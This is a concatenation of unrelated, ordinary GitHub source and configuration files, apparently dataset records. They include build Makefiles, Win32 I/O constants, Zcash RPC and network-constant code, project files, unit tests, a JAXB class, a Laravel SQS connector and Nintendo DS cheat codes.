// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL ANY OF THE AUTHORS OR THE CONTRIBUTING
// INSTITUTIONS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
// EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
// --------------------------------------------------------------------------
// $Maintainer: Timo Sachsenberg $
// $Authors: $
// --------------------------------------------------------------------------
//
| {
"pile_set_name": "Github"
} |
#
# CDDL HEADER START
#
# The contents of this file are subject to the terms
# of the Common Development and Distribution License
# (the "License"). You may not use this file except
# in compliance with the License.
#
# You can obtain a copy of the license at
# src/OPENSOLARIS.LICENSE
# or http://www.opensolaris.org/os/licensing.
# See the License for the specific language governing
# permissions and limitations under the License.
#
# When distributing Covered Code, include this CDDL
# HEADER in each file and include the License file at
# usr/src/OPENSOLARIS.LICENSE. If applicable,
# add the following below this CDDL HEADER, with the
# fields enclosed by brackets "[]" replaced with your
# own identifying information: Portions Copyright [yyyy]
# [name of copyright owner]
#
# CDDL HEADER END
#
#
# Copyright 2005 Sun Microsystems, Inc. All rights reserved.
# Use is subject to license terms.
#
# ident "@(#)Makefile.Darwin 1.5 05/08/04 SMI"
#
SDKROOT ?= /
Product=$(shell tconf --product)
Embedded=$(shell tconf --test TARGET_OS_EMBEDDED)
ifeq "$(Embedded)" "YES"
SDKPATH = $(shell xcodebuild -sdk $(SDKROOT) -version Path)
CFLAGS += -isysroot $(SDKPATH)
endif
CC = xcrun -sdk $(SDKROOT) gcc
#NOPIC= -mdynamic-no-pic
ARCH= i386
ifeq "$(strip $(ARCH))" "fat"
ARCH_FLAG= -arch i386 -arch x86_64
else
ARCH_FLAG= -arch $(ARCH)
endif
### OPT_FLAG value was modified from '-g' to '-Os' as part of the fix for radar 7508837
OPT_FLAG= -Os
SEMOP_FLAG= -DUSE_SEMOP
ifeq "$(Embedded)" "YES"
SEMOP_FLAG=
endif
###
###CFLAGS= -Os -DUSE_SEMOP -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
###extra_CFLAGS= -Os -DUSE_SEMOP -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
###
CFLAGS+= $(OPT_FLAG) $(SEMOP_FLAG) -DUSE_GETHRTIME -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
ifeq "$(Embedded)" "YES"
#CFLAGS+= $(OPT_FLAG) -DUSE_GETHRTIME -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
CFLAGS+= -g -I $(SDKPATH)/System/Library/Frameworks/System.framework/Versions/B/PrivateHeaders/ -F/AppleInternal/Library/Frameworks/ $(MORECFLAGS)
endif
extra_CFLAGS= $(OPT_FLAG) $(SEMOP_FLAG) -fno-builtin $(NOPIC) $(ARCH_FLAG) -Wall
CPPFLAGS= $(SEMOP_FLAG) -D_REENTRANT -Wall
MATHLIB= -lm
ELIDED_BENCHMARKS= \
cachetocache \
atomic \
getcontext \
setcontext \
include ../Makefile.com.Darwin
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation.
// Licensed under the MIT License.
namespace BuildXL.Native.IO
{
/// <summary>
/// Constants that are used for file I/O inside the Native layer
/// </summary>
public static class NativeIOConstants
{
/// <summary>
/// FSCTL_READ_FILE_USN_DATA
/// </summary>
public const uint FsctlReadFileUsnData = 0x900eb;
/// <summary>
/// FSCTL_WRITE_USN_CLOSE_RECORD
/// </summary>
public const uint FsctlWriteUsnCloseRecord = 0x900ef;
/// <summary>
/// FSCTL_QUERY_USN_JOURNAL
/// </summary>
public const uint FsctlQueryUsnJournal = 0x900f4;
/// <summary>
/// FSCTL_READ_USN_JOURNAL
/// </summary>
public const uint FsctlReadUsnJournal = 0x900bb;
/// <summary>
/// FSCTL_READ_UNPRIVILEGED_USN_JOURNAL
/// </summary>
public const uint FsctlReadUnprivilegedUsnJournal = 0x903ab;
/// <summary>
/// FVE_LOCKED_VOLUME
/// </summary>
#pragma warning disable SA1139 // Use literal suffix notation instead of casting
public const int FveLockedVolume = unchecked((int)0x80310000);
#pragma warning restore SA1139
/// <summary>
/// INVALID_FILE_ATTRIBUTES
/// </summary>
public const uint InvalidFileAttributes = 0xFFFFFFFF;
/// <summary>
/// ERROR_JOURNAL_NOT_ACTIVE
/// </summary>
public const uint ErrorJournalNotActive = 0x49B;
/// <summary>
/// ERROR_JOURNAL_DELETE_IN_PROGRESS
/// </summary>
public const uint ErrorJournalDeleteInProgress = 0x49A;
/// <summary>
/// ERROR_JOURNAL_ENTRY_DELETED
/// </summary>
public const uint ErrorJournalEntryDeleted = 0x49D;
/// <summary>
/// ERROR_NO_MORE_FILES
/// </summary>
public const uint ErrorNoMoreFiles = 0x12;
/// <summary>
/// ERROR_WRITE_PROTECT
/// </summary>
public const uint ErrorWriteProtect = 0x13;
/// <summary>
/// ERROR_INVALID_PARAMETER
/// </summary>
public const int ErrorInvalidParameter = 0x57;
/// <summary>
/// ERROR_INVALID_FUNCTION
/// </summary>
public const uint ErrorInvalidFunction = 0x1;
/// <summary>
/// ERROR_ONLY_IF_CONNECTED
/// </summary>
public const uint ErrorOnlyIfConnected = 0x4E3;
/// <summary>
/// ERROR_SUCCESS
/// </summary>
public const int ErrorSuccess = 0x0;
/// <summary>
/// ERROR_ACCESS_DENIED
/// </summary>
public const int ErrorAccessDenied = 0x5;
/// <summary>
/// ERROR_SHARING_VIOLATION
/// </summary>
public const int ErrorSharingViolation = 0x20;
/// <summary>
/// ERROR_TOO_MANY_LINKS
/// </summary>
public const int ErrorTooManyLinks = 0x476;
/// <summary>
/// ERROR_NOT_SAME_DEVICE
/// </summary>
public const int ErrorNotSameDevice = 0x11;
/// <summary>
/// ERROR_NOT_SUPPORTED
/// </summary>
public const int ErrorNotSupported = 0x32;
/// <summary>
/// ERROR_FILE_NOT_FOUND
/// </summary>
public const int ErrorFileNotFound = 0x2;
/// <summary>
/// ERROR_FILE_EXISTS
/// </summary>
public const int ErrorFileExists = 0x50;
/// <summary>
/// ERROR_FILE_ALREADY_EXISTS
/// </summary>
public const int ErrorAlreadyExists = 0xB7;
/// <summary>
/// ERROR_PATH_NOT_FOUND
/// </summary>
public const int ErrorPathNotFound = 0x3;
/// <summary>
/// ERROR_NOT_READY
/// </summary>
public const int ErrorNotReady = 0x15;
/// <summary>
/// ERROR_DIR_NOT_EMPTY
/// </summary>
public const int ErrorDirNotEmpty = 0x91;
/// <summary>
/// ERROR_DIRECTORY
/// </summary>
public const int ErrorDirectory = 0x10b;
/// <summary>
/// ERROR_PARTIAL_COPY
/// </summary>
public const int ErrorPartialCopy = 0x12b;
/// <summary>
/// ERROR_IO_PENDING
/// </summary>
public const int ErrorIOPending = 0x3E5;
/// <summary>
/// ERROR_IO_INCOMPLETE
/// </summary>
public const int ErrorIOIncomplete = 0x3E4;
/// <summary>
/// ERROR_ABANDONED_WAIT_0
/// </summary>
public const int ErrorAbandonedWait0 = 0x2DF;
/// <summary>
/// ERROR_HANDLE_EOF
/// </summary>
public const int ErrorHandleEof = 0x26;
/// <summary>
/// ERROR_TIMEOUT
/// </summary>
public const int ErrorTimeout = 0x5B4;
/// <summary>
/// ERROR_PIPE_BUSY.
/// </summary>
public const int ErrorPipeBusy = 0xE7;
/// <summary>
/// Infinite timeout.
/// </summary>
public const int Infinite = -1;
#if PLATFORM_WIN
/// <summary>
/// Maximum path length.
/// </summary>
public const int MaxPath = 260;
#else
/// <summary>
/// Maximum path length.
/// </summary>
public const int MaxPath = 1024;
#endif
/// <summary>
/// Maximum path length for \\?\ style paths.
/// </summary>
public const int MaxLongPath = 32767;
/// <summary>
/// Maximum path length for directory.
/// </summary>
public const int MaxDirectoryPath = 248;
/// <summary>
/// ERROR_CANT_ACCESS_FILE
/// </summary>
public const int ErrorCantAccessFile = 0x780;
/// <summary>
/// ERROR_BAD_PATHNAME
/// </summary>
public const int ErrorBadPathname = 0xA1;
/// <summary>
/// ERROR_INVALID_NAME
/// </summary>
public const int ErrorInvalidName = 0x7B;
}
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2016 The Zcash developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or https://www.opensource.org/licenses/mit-license.php .
#include "asyncrpcoperation.h"
#include <boost/uuid/uuid.hpp>
#include <boost/uuid/uuid_generators.hpp>
#include <boost/uuid/uuid_io.hpp>
#include <string>
#include <ctime>
#include <chrono>
using namespace std;
static boost::uuids::random_generator uuidgen;
static std::map<OperationStatus, std::string> OperationStatusMap = {
{OperationStatus::READY, "queued"},
{OperationStatus::EXECUTING, "executing"},
{OperationStatus::CANCELLED, "cancelled"},
{OperationStatus::FAILED, "failed"},
{OperationStatus::SUCCESS, "success"}
};
/**
* Every operation instance should have a globally unique id
*/
AsyncRPCOperation::AsyncRPCOperation() : error_code_(0), error_message_() {
// Set a unique reference for each operation
boost::uuids::uuid uuid = uuidgen();
id_ = "opid-" + boost::uuids::to_string(uuid);
creation_time_ = (int64_t)time(NULL);
set_state(OperationStatus::READY);
}
AsyncRPCOperation::AsyncRPCOperation(const AsyncRPCOperation& o) :
id_(o.id_), creation_time_(o.creation_time_), state_(o.state_.load()),
start_time_(o.start_time_), end_time_(o.end_time_),
error_code_(o.error_code_), error_message_(o.error_message_),
result_(o.result_)
{
}
AsyncRPCOperation& AsyncRPCOperation::operator=( const AsyncRPCOperation& other ) {
this->id_ = other.id_;
this->creation_time_ = other.creation_time_;
this->state_.store(other.state_.load());
this->start_time_ = other.start_time_;
this->end_time_ = other.end_time_;
this->error_code_ = other.error_code_;
this->error_message_ = other.error_message_;
this->result_ = other.result_;
return *this;
}
AsyncRPCOperation::~AsyncRPCOperation() {
}
/**
* Override this cancel() method if you can interrupt main() when executing.
*/
void AsyncRPCOperation::cancel() {
if (isReady()) {
set_state(OperationStatus::CANCELLED);
}
}
/**
* Start timing the execution run of the code you're interested in
*/
void AsyncRPCOperation::start_execution_clock() {
std::lock_guard<std::mutex> guard(lock_);
start_time_ = std::chrono::system_clock::now();
}
/**
* Stop timing the execution run
*/
void AsyncRPCOperation::stop_execution_clock() {
std::lock_guard<std::mutex> guard(lock_);
end_time_ = std::chrono::system_clock::now();
}
/**
* Implement this virtual method in any subclass. This is just an example implementation.
*/
void AsyncRPCOperation::main() {
if (isCancelled()) {
return;
}
set_state(OperationStatus::EXECUTING);
start_execution_clock();
// Do some work here..
stop_execution_clock();
// If there was an error, you might set it like this:
/*
setErrorCode(123);
setErrorMessage("Murphy's law");
setState(OperationStatus::FAILED);
*/
// Otherwise, if the operation was a success:
UniValue v(UniValue::VSTR, "We have a result!");
set_result(v);
set_state(OperationStatus::SUCCESS);
}
/**
* Return the error of the completed operation as a UniValue object.
* If there is no error, return null UniValue.
*/
UniValue AsyncRPCOperation::getError() const {
if (!isFailed()) {
return NullUniValue;
}
std::lock_guard<std::mutex> guard(lock_);
UniValue error(UniValue::VOBJ);
error.pushKV("code", this->error_code_);
error.pushKV("message", this->error_message_);
return error;
}
/**
* Return the result of the completed operation as a UniValue object.
* If the operation did not succeed, return null UniValue.
*/
UniValue AsyncRPCOperation::getResult() const {
if (!isSuccess()) {
return NullUniValue;
}
std::lock_guard<std::mutex> guard(lock_);
return this->result_;
}
/**
* Returns a status UniValue object.
* If the operation has failed, it will include an error object.
* If the operation has succeeded, it will include the result value.
* If the operation was cancelled, there will be no error object or result value.
*/
UniValue AsyncRPCOperation::getStatus() const {
OperationStatus status = this->getState();
UniValue obj(UniValue::VOBJ);
obj.pushKV("id", this->id_);
obj.pushKV("status", OperationStatusMap[status]);
obj.pushKV("creation_time", this->creation_time_);
// TODO: Issue #1354: There may be other useful metadata to return to the user.
UniValue err = this->getError();
if (!err.isNull()) {
obj.pushKV("error", err.get_obj());
}
UniValue result = this->getResult();
if (!result.isNull()) {
obj.pushKV("result", result);
// Include execution time for successful operation
std::chrono::duration<double> elapsed_seconds = end_time_ - start_time_;
obj.pushKV("execution_secs", elapsed_seconds.count());
}
return obj;
}
/**
* Return the operation state in human readable form.
*/
std::string AsyncRPCOperation::getStateAsString() const {
OperationStatus status = this->getState();
return OperationStatusMap[status];
}
| {
"pile_set_name": "Github"
} |
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>netcoreapp2.1</TargetFramework>
<DockerDefaultTargetOS>Linux</DockerDefaultTargetOS>
<UserSecretsId>57bcf1e9-cc41-49b6-b2eb-edca5c429e52</UserSecretsId>
<RootNamespace>ContosoTravel.Web.Host.DataService</RootNamespace>
<AssemblyName>ContosoTravel.Web.Host.DataService</AssemblyName>
</PropertyGroup>
<ItemGroup>
<Folder Include="wwwroot\" />
</ItemGroup>
<ItemGroup>
<PackageReference Include="Autofac" Version="4.8.1" />
<PackageReference Include="Autofac.Extensions.DependencyInjection" Version="4.3.0" />
<PackageReference Include="Microsoft.ApplicationInsights.AspNetCore" Version="2.5.1" />
<PackageReference Include="Microsoft.AspNetCore.App" />
<PackageReference Include="Microsoft.Azure.Services.AppAuthentication" Version="1.0.3" />
<PackageReference Include="Microsoft.Extensions.Configuration" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Abstractions" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.AzureKeyVault" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Binder" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.EnvironmentVariables" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.FileExtensions" Version="2.1.1" />
<PackageReference Include="Microsoft.Extensions.Configuration.Json" Version="2.1.1" />
<PackageReference Include="Microsoft.VisualStudio.Web.CodeGeneration.Design" Version="2.1.5" />
<PackageReference Include="NETStandard.Library" Version="2.0.3" />
<PackageReference Include="Nito.AsyncEx.Context" Version="1.1.0" />
<PackageReference Include="Nito.AsyncEx.Coordination" Version="1.0.2" />
<PackageReference Include="TimeZoneConverter" Version="2.4.2" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\Application\Application.csproj" />
</ItemGroup>
<ItemGroup>
<Content Update="appsettings.json">
<CopyToOutputDirectory>Always</CopyToOutputDirectory>
</Content>
</ItemGroup>
</Project>
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
namespace PhysX.Samples.EventsSample
{
public class Program
{
[STAThread]
static void Main(string[] args)
{
new EventsSample();
}
}
} | {
"pile_set_name": "Github"
} |
import {
bootstrapModeler,
inject
} from 'test/TestHelper';
import modelingModule from 'src/features/modeling';
import coreModule from 'src/core';
describe('features/modeling - delete elements', function() {
var testModules = [ coreModule, modelingModule ];
var inputDataXML = require('../../../fixtures/dmn/input-data.dmn');
beforeEach(bootstrapModeler(inputDataXML, { modules: testModules }));
describe('shape handling', function() {
it('should execute', inject(function(elementRegistry, modeling) {
// given
var inputDataShape = elementRegistry.get('temperature_id'),
inputData = inputDataShape.businessObject;
// when
modeling.removeShape(inputDataShape);
// then
expect(inputData.$parent).to.be.null;
}));
});
describe('undo support', function() {
it('should undo', inject(function(elementRegistry, modeling, commandStack) {
// given
var inputDataShape = elementRegistry.get('temperature_id'),
inputData = inputDataShape.businessObject,
parent = inputData.$parent;
// when
modeling.removeShape(inputDataShape);
commandStack.undo();
// then
expect(inputData.$parent).to.eql(parent);
}));
});
describe('redo support', function() {
it('redo', inject(function(elementRegistry, modeling, commandStack) {
// given
var inputDataShape = elementRegistry.get('temperature_id'),
inputData = inputDataShape.businessObject;
// when
modeling.removeShape(inputDataShape);
commandStack.undo();
commandStack.redo();
// then
expect(inputData.$parent).to.be.null;
}));
});
});
| {
"pile_set_name": "Github"
} |
package org.smpte_ra.schemas.st2067_2_2013;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAnyElement;
import javax.xml.bind.annotation.XmlAttribute;
import javax.xml.bind.annotation.XmlMixed;
import javax.xml.bind.annotation.XmlSchemaType;
import javax.xml.bind.annotation.XmlType;
import org.w3c.dom.Element;
/**
* <p>Java class for DigestMethodType complex type.
*
* <p>The following schema fragment specifies the expected content contained within this class.
*
* <pre>
* <complexType name="DigestMethodType">
* <complexContent>
* <restriction base="{http://www.w3.org/2001/XMLSchema}anyType">
* <sequence>
* <any processContents='lax' namespace='##other' maxOccurs="unbounded" minOccurs="0"/>
* </sequence>
* <attribute name="Algorithm" use="required" type="{http://www.w3.org/2001/XMLSchema}anyURI" />
* </restriction>
* </complexContent>
* </complexType>
* </pre>
*
*
*/
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "DigestMethodType", propOrder = {
"content"
})
public class DigestMethodType {
@XmlMixed
@XmlAnyElement(lax = true)
protected List<Object> content;
@XmlAttribute(name = "Algorithm", required = true)
@XmlSchemaType(name = "anyURI")
protected String algorithm;
/**
* Gets the value of the content property.
*
* <p>
* This accessor method returns a reference to the live list,
* not a snapshot. Therefore any modification you make to the
* returned list will be present inside the JAXB object.
* This is why there is not a <CODE>set</CODE> method for the content property.
*
* <p>
* For example, to add a new item, do as follows:
* <pre>
* getContent().add(newItem);
* </pre>
*
*
* <p>
* Objects of the following type(s) are allowed in the list
* {@link String }
* {@link Object }
* {@link Element }
*
*
*/
public List<Object> getContent() {
if (content == null) {
content = new ArrayList<Object>();
}
return this.content;
}
/**
* Gets the value of the algorithm property.
*
* @return
* possible object is
* {@link String }
*
*/
public String getAlgorithm() {
return algorithm;
}
/**
* Sets the value of the algorithm property.
*
* @param value
* allowed object is
* {@link String }
*
*/
public void setAlgorithm(String value) {
this.algorithm = value;
}
}
| {
"pile_set_name": "Github"
} |
exports.abc = 1;
exports.def = require("./other.js");
| {
"pile_set_name": "Github"
} |
//! Constants for the Zcash main network.
/// The mainnet coin type for ZEC, as defined by [SLIP 44].
///
/// [SLIP 44]: https://github.com/satoshilabs/slips/blob/master/slip-0044.md
pub const COIN_TYPE: u32 = 133;
/// The HRP for a Bech32-encoded mainnet [`ExtendedSpendingKey`].
///
/// Defined in [ZIP 32].
///
/// [`ExtendedSpendingKey`]: zcash_primitives::zip32::ExtendedSpendingKey
/// [ZIP 32]: https://github.com/zcash/zips/blob/master/zip-0032.rst
pub const HRP_SAPLING_EXTENDED_SPENDING_KEY: &str = "secret-extended-key-main";
/// The HRP for a Bech32-encoded mainnet [`ExtendedFullViewingKey`].
///
/// Defined in [ZIP 32].
///
/// [`ExtendedFullViewingKey`]: zcash_primitives::zip32::ExtendedFullViewingKey
/// [ZIP 32]: https://github.com/zcash/zips/blob/master/zip-0032.rst
pub const HRP_SAPLING_EXTENDED_FULL_VIEWING_KEY: &str = "zxviews";
/// The HRP for a Bech32-encoded mainnet [`PaymentAddress`].
///
/// Defined in section 5.6.4 of the [Zcash Protocol Specification].
///
/// [`PaymentAddress`]: zcash_primitives::primitives::PaymentAddress
/// [Zcash Protocol Specification]: https://github.com/zcash/zips/blob/master/protocol/protocol.pdf
pub const HRP_SAPLING_PAYMENT_ADDRESS: &str = "zs";
/// The prefix for a Base58Check-encoded mainnet [`TransparentAddress::PublicKey`].
///
/// [`TransparentAddress::PublicKey`]: zcash_primitives::legacy::TransparentAddress::PublicKey
pub const B58_PUBKEY_ADDRESS_PREFIX: [u8; 2] = [0x1c, 0xb8];
/// The prefix for a Base58Check-encoded mainnet [`TransparentAddress::Script`].
///
/// [`TransparentAddress::Script`]: zcash_primitives::legacy::TransparentAddress::Script
pub const B58_SCRIPT_ADDRESS_PREFIX: [u8; 2] = [0x1c, 0xbd];
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
@class IMAPGateway, NSArray, NSMutableArray, NSString;
@interface IMAPMailbox : NSObject
{
id <IMAPMailboxDelegate> _delegate;
unsigned long long _exists;
unsigned int _permanentFlags;
BOOL _hasNewResponses;
unsigned long long _allegedHighestModificationSequence;
unsigned long long _computedHighestModificationSequence;
BOOL _allegedHighestModificationSequenceHasBeenInitialized;
BOOL _computedHighestModificationSequenceHasBeenInitialized;
BOOL _readOnly;
BOOL _uidNotSticky;
BOOL _supportsModificationSequences;
unsigned int _uidNext;
unsigned int _uidValidity;
unsigned int _unseenCount;
id <MCMailbox> _mailbox;
NSString *_referenceName;
IMAPGateway *_selectedGateway;
NSArray *_quotaRoots;
NSMutableArray *_unprocessedResponses;
CDStruct_d3e19d9e _quotaUsage;
}
+ (BOOL)automaticallyNotifiesObserversOfQuotaUsage;
+ (BOOL)automaticallyNotifiesObserversOfAllegedHighestModificationSequence;
+ (BOOL)automaticallyNotifiesObserversOfExists;
@property(retain) NSMutableArray *unprocessedResponses; // @synthesize unprocessedResponses=_unprocessedResponses;
@property BOOL supportsModificationSequences; // @synthesize supportsModificationSequences=_supportsModificationSequences;
@property unsigned int unseenCount; // @synthesize unseenCount=_unseenCount;
@property unsigned int uidNext; // @synthesize uidNext=_uidNext;
@property CDStruct_d3e19d9e quotaUsage; // @synthesize quotaUsage=_quotaUsage;
@property(retain) NSArray *quotaRoots; // @synthesize quotaRoots=_quotaRoots;
@property BOOL uidNotSticky; // @synthesize uidNotSticky=_uidNotSticky;
@property BOOL readOnly; // @synthesize readOnly=_readOnly;
@property(copy) NSString *referenceName; // @synthesize referenceName=_referenceName;
@property(retain) id <MCMailbox> mailbox; // @synthesize mailbox=_mailbox;
- (id)description;
- (id)removeResponse;
- (void)addResponse:(id)arg1;
@property(nonatomic) unsigned int permanentFlags;
- (void)setTotalSize:(unsigned long long)arg1 forQuotaMessageCount:(long long)arg2;
@property unsigned long long computedHighestModificationSequence;
@property unsigned long long allegedHighestModificationSequence;
@property BOOL hasNewResponses;
@property unsigned int uidValidity; // @synthesize uidValidity=_uidValidity;
@property unsigned long long exists;
- (void)setExists:(unsigned long long)arg1 fromIDLE:(BOOL)arg2;
@property(retain) IMAPGateway *selectedGateway; // @synthesize selectedGateway=_selectedGateway;
- (void)clearDelegate:(id)arg1;
- (void)setDelegate:(id)arg1;
- (id)init;
- (id)initWithMailboxName:(id)arg1;
- (void)dealloc;
@end
| {
"pile_set_name": "Github"
} |
cheats = 6
cheat0_desc = "Press L Ability Max"
cheat0_code = "94000130+FDFF0000+120F19EC+000003E8+D0000000+00000000"
cheat0_enable = false
cheat1_desc = "Press X Block is 999"
cheat1_code = "94000136+FFFE0000+B20F19E0+00000000+1000016C+000003E7+D2000000+00000000"
cheat1_enable = false
cheat2_desc = "All Stage in Story Book"
cheat2_code = "D5000000+00000003+C0000000+00000010+D7000000+020F055C+D2000000+00000000"
cheat2_enable = false
cheat3_desc = "All Stage and Omage"
cheat3_code = "D5000000+000000FF+C0000000+00000010+D7000000+020F055C+D2000000+00000000"
cheat3_enable = false
cheat4_desc = "Backlight Codes"
cheat5_desc = "DS Lite Backlight Control"
cheat5_code = "94000130+FCFB0000+023FE074+012FFF11+E0000000+000000A8+E28F0001+E12FFF10+A21AB5F0+88234C24+80138811+D02A428B+25803490+F0002000+1C06F82A+F0002004+2703F826+21404007+D003420B+420B2180+E018D00C+4231210C+2F03D006+1C79D013+F0002004+E00EF816+E0094331+438E210C+2F001C31+1E79D004+F0002004+E002F80A+F0002000+BCF0F806+4718BC08+30800000+88222100+D1FC422A+80224A08+88208060+D1FC4228+80220C12+88228061+D1FC422A+21FF8860+47704008+04000130+80028802+023FE074+E3520003+D2000000+00000000"
cheat5_enable = false
| {
"pile_set_name": "Github"
} |
/*
* JBoss, Home of Professional Open Source
* Copyright 2014, Red Hat, Inc., and individual contributors
* by the @authors tag. See the copyright.txt in the distribution for a
* full listing of individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jboss.weld.tests.unit.ejb.subclass;
public interface BarLocal {
int ping();
}
| {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Queue\Connectors;
use Aws\Sqs\SqsClient;
use Illuminate\Support\Arr;
use Illuminate\Queue\SqsQueue;
class SqsConnector implements ConnectorInterface
{
/**
* Establish a queue connection.
*
* @param array $config
* @return \Illuminate\Contracts\Queue\Queue
*/
public function connect(array $config)
{
$config = array_merge([
'version' => 'latest',
'http' => [
'timeout' => 60,
'connect_timeout' => 60,
],
], $config);
if ($config['key'] && $config['secret']) {
$config['credentials'] = Arr::only($config, ['key', 'secret']);
}
return new SqsQueue(new SqsClient($config), $config['queue']);
}
}
| {
"pile_set_name": "Github"
} |
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// This file isn't built into the .csproj in the runtime libraries but is consumed by Mono.
using System.Runtime.Serialization;
namespace System.Drawing.Printing
{
partial class InvalidPrinterException
{
protected InvalidPrinterException(SerializationInfo info, StreamingContext context) : base(info, context)
{
_settings = (PrinterSettings)info.GetValue("settings", typeof(PrinterSettings));
}
public override void GetObjectData(SerializationInfo info, StreamingContext context)
{
base.GetObjectData(info, context);
info.AddValue("settings", _settings);
}
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/clitoris ## -*- shell-script -*-
$ ! dconv "2015-2015-00-12-12"
$
## dconv.120.clit ends here
| {
"pile_set_name": "Github"
} |
fun some(a : Statement<caret>)
// INVOCATION_COUNT: 1
// EXIST: { lookupString:"Statement", tailText:" (java.sql)" } | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.